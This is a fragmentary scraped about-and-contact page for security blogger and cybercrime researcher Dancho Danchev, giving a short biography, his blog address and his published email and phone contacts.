- Presented at RSA Europe 


He's currently running a high-profile hacking and s 
project on the original https://astalavista.box.sk an 
reached at dancho.danchev@hush.com 
Dancho Danchev

ddanchev.blogspot.com

He is perhaps the most influential Bulgarian blogger on a global scale - a technical expert in the field of cybersecurity.
ABOUT US


Dancho Danchev is an internationally recognized 
cybercrime researcher security blogger OSINT analyst and 
threat intelligence analyst that's currently running one of 
the security industry's most popular security publications 
his personal blog - https://ddanchev.blogspot.com since
December, 2005 which has received approximately 56M 
page views since its original start 
REACH US


+359876893890 
Email: dancho.danchev@hush.com 


https://ddanchev.blogspot.com
Scanning Files Statistics in Last 24 Hours
Device(s) 
Dancho Danchev's Blog - Mind Streams of Information Security Knowledge